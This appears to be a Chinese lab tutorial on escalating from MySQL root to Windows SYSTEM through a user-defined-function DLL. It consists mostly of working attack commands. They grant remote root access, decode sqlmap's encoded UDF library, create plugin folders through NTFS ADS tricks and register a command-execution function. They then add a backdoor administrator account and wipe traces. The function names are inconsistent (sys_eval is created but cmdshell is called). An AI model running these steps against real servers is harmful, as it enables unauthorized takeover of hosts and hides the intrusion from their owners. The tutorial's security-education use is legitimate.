文章目录
- 1.实验环境:
- 2.原理
- 3.提权条件
- 4. 提权步骤
- 1. 获取udf文件
- 2. 将udf文件上传到网站指定目录下
- 3. 执行自定义函数
- 4. 清除痕迹
1.实验环境:
win7 x64
phpstudy 2018
mysql 5.5.532.原理
udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。
通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system权限。
3.提权条件
1、知道mysql的用户名和密码,并且可以远程连接
2、mysql有写入文件的权限,即secure_file_prive的值为空,如下图:
show global variables like '%secure%'
使用命令来查看数据库各个用户的访问权限:
select user,host from mysql.user;使用如下命令将所需要开放的用户的访问权限改为任意:
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '*********' WITH GRANT OPTION;
查看plugin目录:
show variables like 'plugin%';4. 提权步骤
1. 获取udf文件
sqlmap中有现成的udf文件,分为32位和64位,一定要选择对版本,否则会显示:Can‘t open shared library ‘udf.dll‘。
sqlmap\udf\mysql\windows\32目录下存放着32位lib_mysqludf_sys.dll_
sqlmap\udf\mysql\windows\64目录下为64位的lib_mysqludf_sys.dll_
但是sqlmap 中 自带 的shell 以及一些二进制文件,为了防止被误杀都经过异或方式编码,不能直接使用的。
我们可以通过以下命令来获取当前数据库及操作系统的架构情况
select @@version_compile_os, @@version_compile_machine;
显示mysql是32位,操作系统是amd64,我们需要将sqlmap下32位的.dll_文件进行解码:
将其复制到cloak目录下
使用命令:
python3 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys.dll.dll即是解码后的文件
2. 将udf文件上传到网站指定目录下
MySQL<5.0,导出路径随意;5.0 <= MySQL<5.1,则需要导出至目标服务器的系统目录(如:c:/windows/system32/)MySQL 5.1以上版本,必须要把udf.dll文件放到MySQL安装目录下的lib\plugin文件夹下才能创建自定义函数。
一般Lib、Plugin文件夹需要手工建立(可用NTFS ADS流模式突破进而创建文件夹)
select @@basedir; //查找到mysql的目录
select 'It is dll' into dumpfile 'C:\\PHPTutorial\\MySQL\\lib::$INDEX_ALLOCATION'; //利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:\\PHPTutorial\\MySQL\\lib\\plugin::$INDEX_ALLOCATION'; //利用NTFS ADS创建plugin目录将.dll文件复制到/lib/plugin的目录下
sqlmap中的udf文件提供的函数:
sys_eval,执行任意命令,并将输出返回。
sys_exec,执行任意命令,并将退出码返回。
sys_get,获取一个环境变量。
sys_set,创建或修改一个环境变量。从udf文件中引入自定义函数
create function sys_eval returns string soname 'udf.dll'; //sys_eval是函数名称,udf.dll是lib_mysqludf_sys.dll_上传后的文件名
3. 执行自定义函数
//新建账号stray,密码为123456
select cmdshell('net user stray 123456 /add');
//将waitalone加入管理员组
select cmdshell('net localgroup administrators stray /add');4. 清除痕迹
drop function cmdshell; 删除函数
delete from mysql.func where name='cmdshell' 删除函数
